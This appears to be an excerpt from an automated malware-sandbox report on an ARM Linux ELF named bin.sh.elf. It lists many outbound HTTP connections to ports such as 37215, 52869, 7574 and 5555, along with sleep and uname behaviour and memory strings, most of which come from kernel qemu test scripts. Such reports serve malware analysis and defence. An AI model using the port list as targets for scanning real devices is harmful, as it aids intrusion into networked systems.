                            Source: unknownNetwork traffic detected: HTTP traffic on port 36988 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54156 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53132 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49046 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56752 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44882 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45316 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55040 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46662 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47488 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47342 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60802 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59396 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48352 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42380 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42546 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42708 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44144 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59526 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58790 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60546 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38514 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34022 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56744 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59388 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55994 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33796 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44686 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40850 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46068 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58286 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35292 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39496 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45210 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52046 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37048 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33060 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45990 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39538 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55058 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43144 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57418 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36874 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38780 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42400 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39348 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56050 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60678 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54166 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43390 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48328 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53268 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48672 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43596 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48668 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41596 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52134 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35586 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40688 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38308 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33546 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34754 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43214 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52728 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59292 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55938 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43866 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60554 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51138 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57974 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47054 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55244 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59684 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53326 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59850 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34950 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42036 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41868 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45392 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45632 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53164 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38622 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57494 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57780 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60110 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58306 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43794 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55160 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47708 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58938 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43248 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54082 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34328 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43998 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51910 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44266 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35850 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52562 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38582 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55988 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37274 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54184 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37506 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45864 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41990 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42846 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40164 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34598 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55110 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36818 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48712 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36564 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48106 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58156 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42708 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39578 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35576 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60924 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52700 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40232 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55648 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44432 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33012 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46500 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43048 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39882 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55180 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44056 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56264 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37160 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35060 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57816 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60400 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38148 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38580 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59584 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35474 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33648 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44528 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58242 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40580 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36058 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42528 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47156 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56316 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34238 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38530 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50966 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47942 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34716 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42632 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49500 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41238 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40682 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46138 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48772 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39324 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52278 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45440 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35368 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41932 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35718 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57012 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55064 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42904 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42350 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60458 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52488 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53836 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46634 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43014 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45622 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52776 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44658 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48362 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51630 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36688 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35872 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37084 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38894 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48866 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55176 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40326 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42862 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36844 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48404 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49056 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38952 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48022 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41590 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44284 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56568 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53868 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60970 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56124 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38148 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 7574
                            Source: /tmp/bin.sh.elf (PID: 6271)Sleeps longer then 60s: 600.0sJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6240)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6257)Queries kernel information via 'uname': Jump to behavior
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-ppc64)
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
                            Source: kvm.sh.34.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo Monitoring qemu job at yet-as-unknown pid
                            Source: kvm.sh.34.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                            Source: functions.sh2.34.drBinary or memory string: identify_qemu_append () {
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: QEMU="`identify_qemu vmlinux`"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
                            Source: bin.sh.elf, 6240.1.0000557074cec000.0000557074e3e000.rw-.sdmp, bin.sh.elf, 6242.1.0000557074cec000.0000557074e3e000.rw-.sdmpBinary or memory string: tpU!/etc/qemu-binfmt/arm
                            Source: functions.sh2.34.drBinary or memory string: identify_qemu_args () {
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: # Generate -smp qemu argument.
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                            Source: functions.sh2.34.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
                            Source: functions.sh2.34.drBinary or memory string: echo qemu-system-ppc64
                            Source: functions.sh2.34.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                            Source: functions.sh2.34.drBinary or memory string: echo qemu-system-aarch64
                            Source: kvm-recheck-rcu.sh.34.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: functions.sh2.34.drBinary or memory string: # identify_qemu_append qemu-cmd
                            Source: kvm.sh.34.drBinary or memory string: print "needqemurun="
                            Source: functions.sh2.34.drBinary or memory string: identify_qemu_vcpus () {
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
                            Source: kvm.sh.34.drBinary or memory string: print "\tneedqemurun=1"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_args=$5
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: # Generate qemu -append arguments
                            Source: bin.sh.elf, 6240.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp, bin.sh.elf, 6242.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                            Source: functions.sh2.34.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                            Source: kvm.sh.34.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                            Source: functions.sh2.34.drBinary or memory string: echo qemu-system-i386
                            Source: functions.sh2.34.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                            Source: kvm.sh.34.drBinary or memory string: print "if test -n \"$needqemurun\""
                            Source: functions.sh2.34.drBinary or memory string: echo qemu-system-x86_64
                            Source: functions.sh2.34.drBinary or memory string: identify_qemu () {
                            Source: parse-console.sh.34.drBinary or memory string: print_warning Console output contains nul bytes, old qemu still running?
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
                            Source: functions.sh2.34.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: kill -KILL $qemu_pid
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-aarch64)
                            Source: kvm.sh.34.drBinary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
                            Source: bin.sh.elf, 6240.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp, bin.sh.elf, 6242.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo Unknown PID, cannot kill qemu command
                            Source: kvm-recheck-lock.sh.34.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: functions.sh2.34.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                            Source: functions.sh2.34.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-x86_64)
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-aarch64)
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: functions.sh2.34.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_pid=""
                            Source: functions.sh2.34.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: elif test -z "$qemu_pid"
                            Source: bin.sh.elf, 6240.1.0000557074cec000.0000557074e3e000.rw-.sdmp, bin.sh.elf, 6242.1.0000557074cec000.0000557074e3e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                            Source: functions.sh2.34.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
                            Source: kvm.sh.34.drBinary or memory string: --qemu-args|--qemu-arg)
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
                            Source: functions.sh2.34.drBinary or memory string: echo $TORTURE_QEMU_CMD
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_MAC=$2
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_MEM=$2
                            Source: functions.sh2.34.drBinary or memory string: specify_qemu_cpus () {
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-i386)
                            Source: functions.sh2.34.drBinary or memory string: qemu-system-ppc64)
                            Source: functions.sh2.34.drBinary or memory string: # identify_boot_image qemu-cmd
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                            Source: kvm.sh.34.drBinary or memory string: print "needqemurun="
                            Source: functions.sh2.34.drBinary or memory string: # qemu-args already contains "-smp".
                            Source: functions.sh2.34.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                            Source: functions.sh2.34.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                            Source: kvm-test-1-run.sh.34.drBinary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
                            Source: functions.sh2.34.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                            Source: functions.sh2.34.drBinary or memory string: # identify_qemu_vcpus
                            Source: kvm.sh.34.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                            Source: functions.sh2.34.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
